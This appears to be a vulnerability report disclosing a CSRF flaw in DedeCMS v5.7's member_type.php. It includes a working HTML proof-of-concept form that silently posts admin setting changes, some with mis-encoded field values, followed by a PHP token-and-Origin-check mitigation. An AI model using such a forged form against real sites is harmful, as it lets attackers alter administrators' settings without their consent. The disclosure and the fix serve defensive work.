target: https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /src/dede/member_type.php

PoC:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/member_type.php" method="POST">
      <input type="hidden" name="dopost" value="save" />
      <input type="hidden" name="ID&#95;1" value="1" />
      <input type="hidden" name="pname&#95;1" value="�&#184;&#173;绾&#167;�&#188;&#154;�&#145;&#152;�&#141;&#138;�&#185;&#180;" />
      <input type="hidden" name="rank&#95;1" value="50" />
      <input type="hidden" name="money&#95;1" value="100" />
      <input type="hidden" name="exptime&#95;1" value="7" />
      <input type="hidden" name="check&#95;1" value="1" />
      <input type="hidden" name="idend" value="1" />
      <input type="hidden" name="pname&#95;new" value="" />
      <input type="hidden" name="rank&#95;new" value="50" />
      <input type="hidden" name="money&#95;new" value="100" />
      <input type="hidden" name="exptime&#95;new" value="7" />
      <input type="hidden" name="check&#95;new" value="1" />
      <input type="hidden" name="imageField" value="�&#161;&#174;�&#174;&#154;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```


Succeeded.
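The PoC form works because the `dopost=save` request carries nothing an attacker's page cannot supply. The following is an added example, not DedeCMS code and not part of the original report, showing the usual server-side mitigation: a per-session token combined with an Origin check. The function names, the `csrf_token` field name and the sample origins are assumptions made for illustration.

```php
<?php
// Added example, not DedeCMS code: all function and field names are hypothetical.

// Create (once per session) the secret that the admin form embeds in a hidden field.
function csrf_token_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing POST only if it carries the session's token and,
// when the browser sent an Origin header, that origin is the site's own.
function csrf_request_allowed(array $session, array $post, array $server, string $siteOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $siteOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty expected token never matches.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed demonstration, runnable from the command line.
$session = [];
$token   = csrf_token_issue($session);
$site    = 'http://127.0.0.1';

// Fields as in the PoC form: no token, submitted from another origin (constructed value).
$forged = ['dopost' => 'save', 'ID_1' => '1', 'rank_1' => '50', 'idend' => '1'];
var_dump(csrf_request_allowed($session, $forged,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'], $site));

// Same fields sent by the genuine admin form, which includes the hidden token.
$genuine = $forged + ['csrf_token' => $token];
var_dump(csrf_request_allowed($session, $genuine,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site], $site));
```

In a real handler the three arrays would be `$_SESSION`, `$_POST` and `$_SERVER`, and the check would run before any `dopost` action is processed.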